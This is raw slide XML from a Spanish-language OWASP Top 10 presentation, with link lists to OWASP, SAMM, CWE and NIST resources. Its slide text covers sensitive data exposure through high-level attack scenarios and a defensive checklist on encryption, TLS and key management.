Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by-sa/4.0/deed.es" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/"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owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide19.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Base_de_datos_de_la_gesti&#243;n_de_configuraci&#243;n" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Gu%C3%ADa_de_Seguridad_en_Aplicaciones_para_CISOs" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction"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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex"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slide" Target="slide13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.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451.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide22.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/918.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00.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/829.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/799.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/601.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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/502.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/327.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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><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 TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><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OWASP_Proactive_Controls#5:_Implement_Identity_and_Authentication_Controls" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet"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hyperlink" Target="https://pages.nist.gov/800-63-3/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_Identity_Management" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V3_Session_Management" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret"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ASVS_V2_Authentication" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_Stuffing_Prevention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s-AR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Los diez riesgos más críticos en Aplicaciones Web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Este </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR"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trabajo</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s-419"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está</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bajo</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2"/>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3"/>
              </a:rPr>
              <a:t>https://owasp.org</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 7" descr="OWASP_logo.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A6FCCF-1DE4-48F4-AE1A-13B6D28A4443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="381000"/>
            <a:ext cx="3260464" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Grafik 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43063A8E-7D13-45D4-8B0C-7C7FA60FF8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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 8" descr="cc.logo.large.png">
            <a:hlinkClick r:id="rId6"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C721F55-8EBF-4C32-8453-CE0F4864FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5094185" y="9314123"/>
            <a:ext cx="1081144" cy="257976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>una aplicación cifra números de tarjetas de crédito en una base de datos utilizando su cifrado automático. Sin embargo, estos datos son automáticamente descifrados al ser consultados, permitiendo que, si existe un error de inyección SQL se obtengan los números de tarjetas de crédito en texto plano. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>un sitio web no utiliza o fuerza el uso de TLS para todas las páginas, o utiliza cifradores débiles. Un atacante monitorea el tráfico de la red (por ejemplo en una red Wi-Fi insegura), degrada la conexión de HTTPS a HTTP e intercepta los datos, robando las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de sesión del usuario. El atacante reutiliza estas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y secuestra la sesión del usuario (ya autenticado), accediendo o modificando datos privados. También podría alterar los datos enviados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>se utilizan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> simples o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SALT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> para almacenar las contraseñas de los usuarios en una base de datos. Una falla en la carga de archivos permite a un atacante obtener las contraseñas. Utilizando una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rainbow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de valores pre-calculados, se pueden recuperar las contraseñas originales</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lo primero es determinar las necesidades de protección de los datos en tránsito y en almacenamiento. Por ejemplo, contraseñas, números de tarjetas de crédito, registros médicos, información personal y datos sensibles del negocio requieren protección adicional, especialmente si se encuentran en el ámbito de aplicación de leyes de privacidad, como por ejemplo el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Reglamento General de Protección de Datos (RGPD)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o regulaciones financieras, como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>PCI Data Security Standard (PCI DSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Para todos estos datos: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¿Se transmite datos en texto claro? Esto se refiere a protocolos como HTTP, SMTP, TELNET, FTP. El tráfico en Internet es especialmente peligroso. Verifique también todo el tráfico interno, por ejemplo, entre los balanceadores de carga, servidores web o sistemas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>backend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="83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¿Se utilizan algoritmos criptográficos obsoletos o débiles, ya sea por defecto o en código heredado? Por ejemplo MD5, SHA1, etc.</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¿Se utilizan claves criptográficas predeterminadas, se generan o reutilizan claves criptográficas débiles, o falta una gestión o rotación adecuada de las claves?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Por defecto, ¿se aplica cifrado? ¿se han establecido las directivas de seguridad o encabezados para el navegador web?</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¿El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> del usuario (aplicación o cliente de correo), verifica que el certificado enviado por el servidor sea válido?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Véase también </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>criptografía en el almacenamiento (V7)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>protección de datos (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
